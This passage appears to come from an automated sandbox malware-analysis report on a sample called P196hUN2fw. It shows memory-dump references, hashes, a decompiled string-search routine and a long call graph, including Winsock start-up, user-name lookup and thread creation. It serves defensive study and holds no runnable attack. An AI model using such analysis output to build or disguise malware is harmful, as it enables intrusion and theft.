              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CharPrevlstrlen
              • String ID: C:\Users\user\Desktop
              • API String ID: 2709904686-1246513382
              • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
              • Instruction ID: 9e2646df26482555437471894173605ef17f2c9d125cfcd2b42401f98a5df656
              • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
              • Instruction Fuzzy Hash: D6D0C9A240DDB1AEE70363249C04B9F6A88DF17710F0944A6E180B61A5C77C4D828BAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405A63 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405A63(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









              0x00405a73
              0x00405a75
              0x00405a78
              0x00405aa4
              0x00405a7d
              0x00405a86
              0x00405a8b
              0x00405a96
              0x00405a99
              0x00405ab5
              0x00405a9b
              0x00405aa2
              0x00000000
              0x00405aa2
              0x00405aae
              0x00405ab2
              0x00405ab2
              0x00405aac
              0x00000000

              APIs
              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A8B
              • CharNextA.USER32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A9C
              • lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
              • Instruction ID: de8867e187cffd76a1833f018909c3af52f45fcf8c0597c8515af2ce59788131
              • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
              • Instruction Fuzzy Hash: F5F0C231201818AFCB02DBA4CD80D9EBBA8EF46350B2540B9E840F7211D774DE019FA9
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:8.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:2.9%
              Total number of Nodes:2000
              Total number of Limit Nodes:31
              execution_graph 16232 1291430 16238 12cfe5d 16232->16238 16234 1291473 16253 12a9500 EnterCriticalSection 16234->16253 16237 12ab1c0 16239 12cfe87 16238->16239 16240 12cfe73 16238->16240 16297 12d7220 16239->16297 16345 12d3e40 16240->16345 16254 12a9575 16253->16254 16290 12a96d9 16253->16290 16784 12a9780 EnterCriticalSection 16254->16784 16256 12a957b 16806 12a2dd0 16256->16806 16257 12a9726 LeaveCriticalSection 16258 12cae19 _ValidateLocalCookies 5 API calls 16257->16258 16261 129147b EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 16258->16261 16260 12a971c std::ios_base::_Ios_base_dtor 16260->16257 16261->16237 16262 12a9583 16816 12982b0 16262->16816 16263 12a9772 16264 12cf35f std::_Facet_Register 22 API calls 16263->16264 16266 12a9777 16264->16266 16267 12a958c 16268 12a95bc std::ios_base::_Ios_base_dtor 16267->16268 16271 12a9763 16267->16271 16269 12a95cc 16268->16269 16270 12a95e0 16268->16270 16836 12a1ee0 16269->16836 16846 12983b0 16270->16846 16868 12cf35f 16271->16868 16275 12a95ee 16851 12c5880 16275->16851 16276 12a9768 16280 12cf35f std::_Facet_Register 22 API calls 16276->16280 16277 12a9698 RegisterEventSourceW 16821 12d429a 16277->16821 16283 12a976d 16280->16283 16281 12a95f6 16284 12982b0 22 API calls 16281->16284 16282 12a96c8 16288 12d3e40 __dosmaperr 11 API calls 16282->16288 16282->16290 16285 12cf35f std::_Facet_Register 22 API calls 16283->16285 16286 12a9602 16284->16286 16285->16263 16286->16276 16287 12a9632 std::ios_base::_Ios_base_dtor 16286->16287 16289 12983b0 23 API calls 16287->16289 16288->16290 16291 12a964a 16289->16291 16290->16257 16290->16260 16290->16263 16858 12c5770 16291->16858 16293 12a9652 16294 12982b0 22 API calls 16293->16294 16295 12a965e 16294->16295 16295->16277 16295->16283 16296 12a95db std::ios_base::_Ios_base_dtor 16295->16296 16296->16277 16298 12d722b 16297->16298 16299 12d723d 16298->16299 16351 12da785 16298->16351 16320 12d7243 SetLastError 16299->16320 16356 12da7c4 16299->16356 16306 12d72d7 16378 12d5772 16306->16378 16307 12cfe8c 16324 12daa45 16307->16324 16308 12d728a 16311 12da7c4 __dosmaperr 5 API calls 16308->16311 16309 12d7273 16312 12da7c4 __dosmaperr 5 API calls 16309->16312 16314 12d7296 16311->16314 16321 12d7281 16312->16321 16315 12d72ab 16314->16315 16316 12d729a 16314->16316 16373 12d704e 16315->16373 16318 12da7c4 __dosmaperr 5 API calls 16316->16318 16318->16321 16320->16306 16320->16307 16368 12d800f 16321->16368 16323 12d800f _free 11 API calls 16323->16320 16742 12da36e 16324->16742 16344 12daa77 16344->16344 16346 12d7377 __dosmaperr 11 API calls 16345->16346 16347 12cfe78 16346->16347 16348 12cf34f 16347->16348 16772 12cf2eb 16348->16772 16350 12cf35b 16350->16234 16393 12da553 16351->16393 16354 12da7bc TlsGetValue 16355 12da7aa 16355->16299 16357 12da553 __dosmaperr 4 API calls 16356->16357 16358 12da7e0 16357->16358 16359 12da7fe TlsSetValue 16358->16359 16360 12d725b 16358->16360 16360->16320 16361 12d7fb2 16360->16361 16367 12d7fbf __dosmaperr 16361->16367 16362 12d7fff 16364 12d3e40 __dosmaperr 10 API calls 16362->16364 16363 12d7fea RtlAllocateHeap 16365 12d726b 16363->16365 16363->16367 16364->16365 16365->16308 16365->16309 16367->16362 16367->16363 16406 12d5aef 16367->16406 16369 12d801a HeapFree 16368->16369 16372 12d8035 __dosmaperr 16368->16372 16370 12d802f 16369->16370 16369->16372 16371 12d3e40 __dosmaperr 10 API calls 16370->16371 16371->16372 16372->16320 16420 12d6ee2 16373->16420 16562 12d43f9 16378->16562 16381 12d5782 16383 12d578c IsProcessorFeaturePresent 16381->16383 16388 12d57ab 16381->16388 16384 12d5798 16383->16384 16592 12cf1a3 16384->16592 16387 12d57b5 std::locale::_Setgloballocale 16389 12d7220 std::locale::_Setgloballocale 36 API calls 16387->16389 16598 12d664a 16388->16598 16392 12d57c7 16389->16392 16390 12d5772 std::locale::_Setgloballocale 36 API calls 16391 12d57f1 16390->16391 16392->16390 16394 12da581 16393->16394 16397 12da57d 16393->16397 16394->16397 16400 12da48c 16394->16400 16397->16354 16397->16355 16398 12da59b GetProcAddress 16398->16397 16399 12da5ab __dosmaperr 16398->16399 16399->16397 16404 12da49d __dosmaperr 16400->16404 16401 12da4bb LoadLibraryExW 16401->16404 16402 12da531 FreeLibrary 16402->16404 16403 12da548 16403->16397 16403->16398 16404->16401 16404->16402 16404->16403 16405 12da509 LoadLibraryExW 16404->16405 16405->16404 16409 12d5b1c 16406->16409 16410 12d5b28 std::locale::_Setgloballocale 16409->16410 16415 12d4e5f EnterCriticalSection 16410->16415 16412 12d5b33 16416 12d5b6f 16412->16416 16415->16412 16419 12d4ea7 LeaveCriticalSection 16416->16419 16418 12d5afa 16418->16367 16419->16418 16421 12d6eee std::locale::_Setgloballocale 16420->16421 16434 12d4e5f EnterCriticalSection 16421->16434 16423 12d6ef8 16435 12d6f28 16423->16435 16426 12d6ff4 16427 12d7000 std::locale::_Setgloballocale 16426->16427 16439 12d4e5f EnterCriticalSection 16427->16439 16429 12d700a 16440 12d71d5 16429->16440 16431 12d7022 16444 12d7042 16431->16444 16434->16423 16438 12d4ea7 LeaveCriticalSection 16435->16438 16437 12d6f16 16437->16426 16438->16437 16439->16429 16441 12d720b __Getctype 16440->16441 16442 12d71e4 __Getctype 16440->16442 16441->16431 16442->16441 16447 12d85db 16442->16447 16561 12d4ea7 LeaveCriticalSection 16444->16561 16446 12d7030 16446->16323 16448 12d85f1 16447->16448 16449 12d865b 16447->16449 16448->16449 16455 12d8624 16448->16455 16458 12d800f _free 11 API calls 16448->16458 16451 12d800f _free 11 API calls 16449->16451 16474 12d86a9 16449->16474 16452 12d867d 16451->16452 16453 12d800f _free 11 API calls 16452->16453 16456 12d8690 16453->16456 16454 12d8646 16457 12d800f _free 11 API calls 16454->16457 16455->16454 16462 12d800f _free 11 API calls 16455->16462 16461 12d800f _free 11 API calls 16456->16461 16463 12d8650 16457->16463 16460 12d8619 16458->16460 16459 12d86b7 16464 12d8717 16459->16464 16473 12d800f 11 API calls _free 16459->16473 16475 12d7472 16460->16475 16466 12d869e 16461->16466 16467 12d863b 16462->16467 16468 12d800f _free 11 API calls 16463->16468 16469 12d800f _free 11 API calls 16464->16469 16471 12d800f _free 11 API calls 16466->16471 16503 12d7927 16467->16503 16468->16449 16470 12d871d 16469->16470 16470->16441 16471->16474 16473->16459 16515 12d874c 16474->16515 16476 12d7483 16475->16476 16502 12d756c 16475->16502 16477 12d7494 16476->16477 16479 12d800f _free 11 API calls 16476->16479 16478 12d74a6 16477->16478 16480 12d800f _free 11 API calls 16477->16480 16481 12d74b8 16478->16481 16482 12d800f _free 11 API calls 16478->16482 16479->16477 16480->16478 16483 12d74ca 16481->16483 16484 12d800f _free 11 API calls 16481->16484 16482->16481 16485 12d800f _free 11 API calls 16483->16485 16489 12d74dc 16483->16489 16484->16483 16485->16489 16486 12d800f _free 11 API calls 16487 12d74ee 16486->16487 16488 12d7500 16487->16488 16490 12d800f _free 11 API calls 16487->16490 16491 12d7512 16488->16491 16492 12d800f _free 11 API calls 16488->16492 16489->16486 16489->16487 16490->16488 16493 12d7524 16491->16493 16495 12d800f _free 11 API calls 16491->16495 16492->16491 16494 12d7536 16493->16494 16496 12d800f _free 11 API calls 16493->16496 16497 12d7548 16494->16497 16498 12d800f _free 11 API calls 16494->16498 16495->16493 16496->16494 16499 12d755a 16497->16499 16500 12d800f _free 11 API calls 16497->16500 16498->16497 16501 12d800f _free 11 API calls 16499->16501 16499->16502 16500->16499 16501->16502 16502->16455 16504 12d798c 16503->16504 16505 12d7934 16503->16505 16504->16454 16506 12d7944 16505->16506 16508 12d800f _free 11 API calls 16505->16508 16507 12d7956 16506->16507 16509 12d800f _free 11 API calls 16506->16509 16510 12d7968 16507->16510 16511 12d800f _free 11 API calls 16507->16511 16508->16506 16509->16507 16512 12d797a 16510->16512 16513 12d800f _free 11 API calls 16510->16513 16511->16510 16512->16504 16514 12d800f _free 11 API calls 16512->16514 16513->16512 16514->16504 16516 12d8759 16515->16516 16517 12d8778 16515->16517 16516->16517 16521 12d7e53 16516->16521 16517->16459 16520 12d800f _free 11 API calls 16520->16517 16522 12d7f31 16521->16522 16523 12d7e64 16521->16523 16522->16520 16557 12d7b9f 16523->16557 16526 12d7b9f __Getctype 11 API calls 16527 12d7e77 16526->16527 16528 12d7b9f __Getctype 11 API calls 16527->16528 16529 12d7e82 16528->16529 16530 12d7b9f __Getctype 11 API calls 16529->16530 16531 12d7e8d 16530->16531 16532 12d7b9f __Getctype 11 API calls 16531->16532 16533 12d7e9b 16532->16533 16534 12d800f _free 11 API calls 16533->16534 16535 12d7ea6 16534->16535 16536 12d800f _free 11 API calls 16535->16536 16537 12d7eb1 16536->16537 16538 12d800f _free 11 API calls 16537->16538 16539 12d7ebc 16538->16539 16540 12d7b9f __Getctype 11 API calls 16539->16540 16541 12d7eca 16540->16541 16542 12d7b9f __Getctype 11 API calls 16541->16542 16543 12d7ed8 16542->16543 16544 12d7b9f __Getctype 11 API calls 16543->16544 16545 12d7ee9 16544->16545 16546 12d7b9f __Getctype 11 API calls 16545->16546 16547 12d7ef7 16546->16547 16548 12d7b9f __Getctype 11 API calls 16547->16548 16549 12d7f05 16548->16549 16550 12d800f _free 11 API calls 16549->16550 16551 12d7f10 16550->16551 16552 12d800f _free 11 API calls 16551->16552 16558 12d7bd2 16557->16558 16559 12d7bc2 16557->16559 16558->16526 16559->16558 16560 12d800f _free 11 API calls 16559->16560 16560->16559 16561->16446 16601 12d432b 16562->16601 16565 12d4447 16566 12d4453 std::locale::_Setgloballocale 16565->16566 16567 12d447a std::locale::_Setgloballocale 16566->16567 16571 12d4480 std::locale::_Setgloballocale 16566->16571 16612 12d7377 16566->16612 16569 12d44c5 16567->16569 16567->16571 16591 12d44af 16567->16591 16570 12d3e40 __dosmaperr 11 API calls 16569->16570 16572 12d44ca 16570->16572 16575 12d44f1 16571->16575 16635 12d4e5f EnterCriticalSection 16571->16635 16573 12cf34f __cftof 22 API calls 16572->16573 16573->16591 16577 12d462e 16575->16577 16578 12d4539 16575->16578 16588 12d4564 16575->16588 16580 12d4639 16577->16580 16643 12d4ea7 LeaveCriticalSection 16577->16643 16578->16588 16636 12d443e 16578->16636 16582 12d664a std::locale::_Setgloballocale 35 API calls 16580->16582 16583 12d4641 16582->16583 16585 12d7220 std::locale::_Setgloballocale 37 API calls 16589 12d45b8 16585->16589 16587 12d443e std::locale::_Setgloballocale 37 API calls 16587->16588 16639 12d45da 16588->16639 16590 12d7220 std::locale::_Setgloballocale 37 API calls 16589->16590 16589->16591 16590->16591 16591->16381 16593 12cf1bf __cftof std::locale::_Setgloballocale 16592->16593 16594 12cf1eb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16593->16594 16597 12cf2bc std::locale::_Setgloballocale 16594->16597 16596 12cf2da 16596->16388 16645 12cae19 16597->16645 16653 12d6524 16598->16653 16602 12d4337 std::locale::_Setgloballocale 16601->16602 16607 12d4e5f EnterCriticalSection 16602->16607 16604 12d4345 16608 12d4383 16604->16608 16607->16604 16611 12d4ea7 LeaveCriticalSection 16608->16611 16610 12d436c 16610->16381 16610->16565 16611->16610 16613 12d7382 16612->16613 16614 12d7394 16613->16614 16615 12da785 __dosmaperr 5 API calls 16613->16615 16616 12da7c4 __dosmaperr 5 API calls 16614->16616 16618 12d739a SetLastError 16614->16618 16615->16614 16617 12d73b2 16616->16617 16617->16618 16619 12d7fb2 __dosmaperr 10 API calls 16617->16619 16618->16567 16621 12d73c2 16619->16621 16622 12d73ca 16621->16622 16623 12d73e1 16621->16623 16624 12da7c4 __dosmaperr 5 API calls 16622->16624 16625 12da7c4 __dosmaperr 5 API calls 16623->16625 16632 12d73d8 16624->16632 16626 12d73ed 16625->16626 16627 12d73f1 16626->16627 16628 12d7402 16626->16628 16630 12da7c4 __dosmaperr 5 API calls 16627->16630 16631 12d704e __dosmaperr 10 API calls 16628->16631 16629 12d800f _free 10 API calls 16629->16618 16630->16632 16633 12d740d 16631->16633 16632->16629 16634 12d800f _free 10 API calls 16633->16634 16634->16618 16635->16575 16637 12d7220 std::locale::_Setgloballocale 37 API calls 16636->16637 16638 12d4443 16637->16638 16638->16587 16640 12d45a9 16639->16640 16641 12d45e0 16639->16641 16640->16585 16640->16589 16640->16591 16644 12d4ea7 LeaveCriticalSection 16641->16644 16643->16580 16644->16640 16646 12cae21 16645->16646 16647 12cae22 IsProcessorFeaturePresent 16645->16647 16646->16596 16649 12cb752 16647->16649 16652 12cb715 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16649->16652 16651 12cb835 16651->16596 16652->16651 16654 12d6544 16653->16654 16655 12d6532 16653->16655 16665 12d63ea 16654->16665 16681 12cbb39 GetModuleHandleW 16655->16681 16660 12d657d 16660->16387 16666 12d63f6 std::locale::_Setgloballocale 16665->16666 16689 12d4e5f EnterCriticalSection 16666->16689 16668 12d6400 16690 12d6437 16668->16690 16673 12d6588 16735 12dcb92 GetPEB 16673->16735 16676 12d65b7 16679 12d65ca std::locale::_Setgloballocale 3 API calls 16676->16679 16677 12d6597 GetPEB 16677->16676 16678 12d65a7 GetCurrentProcess TerminateProcess 16677->16678 16678->16676 16680 12d65bf ExitProcess 16679->16680 16682 12cbb45 16681->16682 16682->16654 16683 12d65ca GetModuleHandleExW 16682->16683 16684 12d660c 16683->16684 16685 12d65e9 GetProcAddress 16683->16685 16687 12d6543 16684->16687 16688 12d6612 FreeLibrary 16684->16688 16686 12d65fe 16685->16686 16686->16684 16687->16654 16688->16687 16689->16668 16692 12d6443 std::locale::_Setgloballocale 16690->16692 16691 12d640d 16698 12d642b 16691->16698 16692->16691 16693 12d64a4 16692->16693 16701 12d6b05 16692->16701 16694 12d64c1 16693->16694 16704 12d6377 16693->16704 16697 12d6377 std::locale::_Setgloballocale 26 API calls 16694->16697 16697->16691 16734 12d4ea7 LeaveCriticalSection 16698->16734 16700 12d6419 16700->16660 16700->16673 16708 12d6836 16701->16708 16705 12d63b7 16704->16705 16706 12d639b 16704->16706 16705->16694 16706->16705 16724 12910e0 16706->16724 16709 12d6842 std::locale::_Setgloballocale 16708->16709 16716 12d4e5f EnterCriticalSection 16709->16716 16711 12d6850 16717 12d6a15 16711->16717 16716->16711 16718 12d685d 16717->16718 16719 12d6a34 16717->16719 16721 12d6885 16718->16721 16719->16718 16720 12d800f _free 11 API calls 16719->16720 16720->16718 16722 12d4ea7 std::_Lockit::~_Lockit LeaveCriticalSection 16721->16722 16723 12d686e 16722->16723 16723->16693 16731 12cb323 16724->16731 16727 129111a WSAStartup 16728 129112d 16727->16728 16729 12cae19 _ValidateLocalCookies 5 API calls 16728->16729 16730 129113b 16729->16730 16730->16706 16732 12cb2f6 25 API calls 16731->16732 16733 1291104 16732->16733 16733->16727 16733->16728 16734->16700 16736 12dcbac 16735->16736 16737 12d6592 16735->16737 16739 12da5d6 16736->16739 16737->16676 16737->16677 16740 12da553 __dosmaperr 4 API calls 16739->16740 16741 12da5f2 16740->16741 16741->16737 16743 12da553 __dosmaperr 4 API calls 16742->16743 16744 12da384 16743->16744 16745 12da388 16744->16745 16746 12da553 __dosmaperr 4 API calls 16745->16746 16747 12da39e 16746->16747 16748 12da3a2 16747->16748 16749 12da553 __dosmaperr 4 API calls 16748->16749 16750 12da3b8 16749->16750 16751 12da3bc 16750->16751 16752 12da553 __dosmaperr 4 API calls 16751->16752 16753 12da3d2 16752->16753 16754 12da3d6 16753->16754 16755 12da553 __dosmaperr 4 API calls 16754->16755 16756 12da3ec 16755->16756 16757 12da3f0 16756->16757 16758 12da553 __dosmaperr 4 API calls 16757->16758 16759 12da406 16758->16759 16760 12da40a 16759->16760 16761 12da553 __dosmaperr 4 API calls 16760->16761 16762 12da420 16761->16762 16763 12da424 16762->16763 16764 12da553 __dosmaperr 4 API calls 16763->16764 16765 12da43a 16764->16765 16766 12da458 16765->16766 16767 12da553 __dosmaperr 4 API calls 16766->16767 16768 12da46e 16767->16768 16769 12da43e 16768->16769 16770 12da553 __dosmaperr 4 API calls 16769->16770 16771 12da454 16770->16771 16771->16344 16773 12d7377 __dosmaperr 11 API calls 16772->16773 16774 12cf2f6 16773->16774 16775 12cf304 16774->16775 16780 12cf37c IsProcessorFeaturePresent 16774->16780 16775->16350 16777 12cf34e 16778 12cf2eb std::_Facet_Register 22 API calls 16777->16778 16779 12cf35b 16778->16779 16779->16350 16781 12cf388 16780->16781 16782 12cf1a3 std::locale::_Setgloballocale 8 API calls 16781->16782 16783 12cf39d GetCurrentProcess TerminateProcess 16782->16783 16783->16777 16785 12a9858 16784->16785 16786 12a97cd 16784->16786 16791 12a1ee0 23 API calls 16785->16791 16787 12a987b LeaveCriticalSection 16786->16787 16788 12a2dd0 24 API calls 16786->16788 16789 12cae19 _ValidateLocalCookies 5 API calls 16787->16789 16790 12a97e1 16788->16790 16792 12a989c 16789->16792 16793 12a97fb 16790->16793 16794 12a97ed 16790->16794 16791->16787 16792->16256 16873 1299a40 16793->16873 16795 12a1ee0 23 API calls 16794->16795 16797 12a97f9 16795->16797 16798 12a1ee0 23 API calls 16797->16798 16799 12a9820 16798->16799 16799->16787 16800 12a984c std::ios_base::_Ios_base_dtor 16799->16800 16801 12a98a2 16799->16801 16800->16787 16802 12cf35f std::_Facet_Register 22 API calls 16801->16802 16803 12a98a7 16802->16803 16923 12a98f0 EnterCriticalSection 16803->16923 16807 12a1e80 23 API calls 16806->16807 16808 12a2e18 __cftof 16807->16808 16809 12a2e33 GetModuleFileNameW 16808->16809 16810 12a2e71 16809->16810 16813 12a2e8e 16809->16813 16812 12a1ee0 23 API calls 16810->16812 16811 12a2eaf std::ios_base::_Ios_base_dtor 16811->16262 16812->16813 16813->16811 16814 12cf35f std::_Facet_Register 22 API calls 16813->16814 16815 12a2ed4 16814->16815 16817 12982be 16816->16817 16818 12982e7 std::ios_base::_Ios_base_dtor 16816->16818 16817->16818 16819 12cf35f std::_Facet_Register 22 API calls 16817->16819 16818->16267 16820 1298330 16819->16820 16822 12d42bb 16821->16822 16823 12d42a7 16821->16823 17730 12d424a 16822->17730 16824 12d3e40 __dosmaperr 11 API calls 16823->16824 16826 12d42ac 16824->16826 16828 12cf34f __cftof 22 API calls 16826->16828 16830 12d42b7 16828->16830 16829 12d42d0 CreateThread 16831 12d42ef 16829->16831 16832 12d42fb 16829->16832 17755 12d413e 16829->17755 16830->16282 17739 12d3e0a 16831->17739 17744 12d41bc 16832->17744 16839 12a1f27 16836->16839 16841 12a1ef3 std::locale::_Init 16836->16841 16837 12a1fdb 16838 12a1d70 23 API calls 16837->16838 16840 12a1fe0 16838->16840 16839->16837 16842 12a1e80 23 API calls 16839->16842 16841->16296 16843 12a1f6f std::locale::_Init 16842->16843 16844 12a1fba std::ios_base::_Ios_base_dtor 16843->16844 16845 12cf35f std::_Facet_Register 22 API calls 16843->16845 16844->16296 16845->16837 16847 12983db 16846->16847 16848 12983e2 16847->16848 16849 12a1e80 23 API calls 16847->16849 16848->16275 16850 1298414 std::locale::_Init 16849->16850 16850->16275 16852 12c58c6 16851->16852 16853 12a1ee0 23 API calls 16852->16853 16854 12c599f std::ios_base::_Ios_base_dtor 16852->16854 16855 12c5973 16853->16855 16854->16281 16855->16854 16856 12cf35f std::_Facet_Register 22 API calls 16855->16856 16857 12c59f9 16856->16857 16859 12c57ba 16858->16859 16860 12c586f 16859->16860 16861 12c5806 16859->16861 17829 12986e0 16860->17829 16863 12a1ee0 23 API calls 16861->16863 16864 12c5825 16863->16864 16865 12c5851 std::ios_base::_Ios_base_dtor 16864->16865 16866 12cf35f std::_Facet_Register 22 API calls 16864->16866 16865->16293 16867 12c5879 16866->16867 16869 12cf2eb std::_Facet_Register 22 API calls 16868->16869 16870 12cf36e 16869->16870 16871 12cf37c __Getctype 11 API calls 16870->16871 16872 12cf37b 16871->16872 16874 1299a98 16873->16874 16878 1299a5f std::locale::_Init 16873->16878 16875 1299ba8 16874->16875 16876 1299aa7 16874->16876 16994 12a1d70 16875->16994 16971 12a1e80 16876->16971 16878->16797 16880 12cf35f std::_Facet_Register 22 API calls 16881 1299bb2 16880->16881 16997 129aef0 16881->16997 16883 1299aea std::locale::_Init 16883->16880 16887 1299b5e std::ios_base::_Ios_base_dtor std::locale::_Init 16883->16887 16887->16797 16891 1299c86 16892 1299f52 16891->16892 16899 1299a40 75 API calls 16891->16899 17045 129b4c0 16891->17045 16893 1299a40 75 API calls 16892->16893 16894 1299fa8 16893->16894 16895 129a08c 16894->16895 16896 1299fcb 16894->16896 17091 12a1be0 16895->17091 17076 129ab20 16896->17076 16899->16891 16902 129a037 17086 129a8e0 16902->17086 16908 129a042 16924 12a9999 16923->16924 16925 12a9d40 LeaveCriticalSection 16923->16925 16924->16925 16927 12a99be 16924->16927 16967 12a9cce std::ios_base::_Ios_base_dtor 16925->16967 16926 12a9d77 std::ios_base::_Ios_base_dtor 16930 12cae19 _ValidateLocalCookies 5 API calls 16926->16930 16928 12a99de 16927->16928 16929 12a99c7 GetSystemTimeAsFileTime 16927->16929 16934 12a99ee GetCurrentThreadId 16928->16934 16935 12a99fc 16928->16935 16929->16928 16932 12a98c4 16930->16932 16931 12a9da9 16933 12cf35f std::_Facet_Register 22 API calls 16931->16933 16932->16256 16936 12a9dae 16933->16936 16934->16935 16937 12a9bc3 LeaveCriticalSection 16935->16937 16938 12a9a04 GetUserNameExW 16935->16938 16939 12cae5d std::_Facet_Register 23 API calls 16937->16939 16941 12a9a34 16938->16941 16940 12a9bd9 16939->16940 16949 12a1ee0 23 API calls 16940->16949 16957 12a9c5f 16940->16957 16942 12a9a90 GetUserNameExW 16941->16942 16944 12a9a68 16941->16944 16945 12a9d9f 16941->16945 16963 12a9afc std::ios_base::_Ios_base_dtor 16941->16963 16943 12a9aad 16942->16943 16955 12a9aa5 16942->16955 16956 12a1ee0 23 API calls 16943->16956 16947 12a1e80 23 API calls 16944->16947 16948 129cee0 23 API calls 16945->16948 16946 12a9c8c 16953 12a9ca7 16946->16953 16959 12a1ee0 23 API calls 16946->16959 16958 12a9a71 __cftof 16947->16958 16951 12a9da4 16948->16951 16949->16957 16950 12a1ee0 23 API calls 16950->16946 16952 12cf35f std::_Facet_Register 22 API calls 16951->16952 16952->16931 16954 12a9cbf 16953->16954 16962 12a1ee0 23 API calls 16953->16962 17665 12aa9a0 WaitForSingleObject 16954->17665 16955->16951 16955->16963 16956->16955 16957->16946 16957->16950 16958->16942 16959->16953 16962->16954 16963->16937 17654 12994d0 16963->17654 16967->16926 16967->16931 16972 12a1e8d 16971->16972 16973 12a1ed0 16971->16973 16975 12a1eb9 16972->16975 16976 12a1e96 16972->16976 17152 12a1e60 16973->17152 16979 12a1eca 16975->16979 16982 12cae5d std::_Facet_Register 23 API calls 16975->16982 16976->16973 16978 12a1e9d 16976->16978 16977 12a1ea3 16980 12cf35f std::_Facet_Register 22 API calls 16977->16980 16984 12a1eac 16977->16984 17123 12cae5d 16978->17123 16979->16883 16986 12a1eda 16980->16986 16983 12a1ec3 16982->16983 16983->16883 16984->16883 16985 12a1fdb 16987 12a1d70 23 API calls 16985->16987 16986->16985 16989 12a1ef3 std::locale::_Init 16986->16989 16990 12a1e80 23 API calls 16986->16990 16988 12a1fe0 16987->16988 16989->16883 16991 12a1f6f std::locale::_Init 16990->16991 16992 12a1fba std::ios_base::_Ios_base_dtor 16991->16992 16993 12cf35f std::_Facet_Register 22 API calls 16991->16993 16992->16883 16993->16985 17180 12ca09e 16994->17180 16998 129af39 16997->16998 16999 1299c0b 16997->16999 17209 12c9dcb 16998->17209 17001 129b170 16999->17001 17002 12ca2b4 std::_Lockit::_Lockit 6 API calls 17001->17002 17003 129b1b8 17002->17003 17004 12ca2b4 std::_Lockit::_Lockit 6 API calls 17003->17004 17009 129b1fa 17003->17009 17005 129b1da 17004->17005 17007 12ca30c std::_Lockit::~_Lockit 2 API calls 17005->17007 17006 12ca30c std::_Lockit::~_Lockit 2 API calls 17008 1299c18 17006->17008 17007->17009 17022 129b320 17008->17022 17010 12cae5d std::_Facet_Register 23 API calls 17009->17010 17021 129b242 17009->17021 17011 129b250 17010->17011 17277 12a1550 17011->17277 17021->17006 17025 129b35e 17022->17025 17023 1299c7b 17027 129af90 17023->17027 17024 12a1be0 25 API calls 17026 129b4b2 17024->17026 17025->17023 17025->17024 17028 129aef0 42 API calls 17027->17028 17029 129afcc 17028->17029 17030 129b170 71 API calls 17029->17030 17033 129afd9 17030->17033 17031 129b02e 17561 129ca80 17031->17561 17032 129b091 17587 129cc40 17032->17587 17033->17031 17036 129b05c 17033->17036 17036->17032 17038 129ab20 23 API calls 17036->17038 17037 129b04c 17039 129a8e0 22 API calls 17037->17039 17040 129b07f 17038->17040 17041 129b057 17039->17041 17043 129a8e0 22 API calls 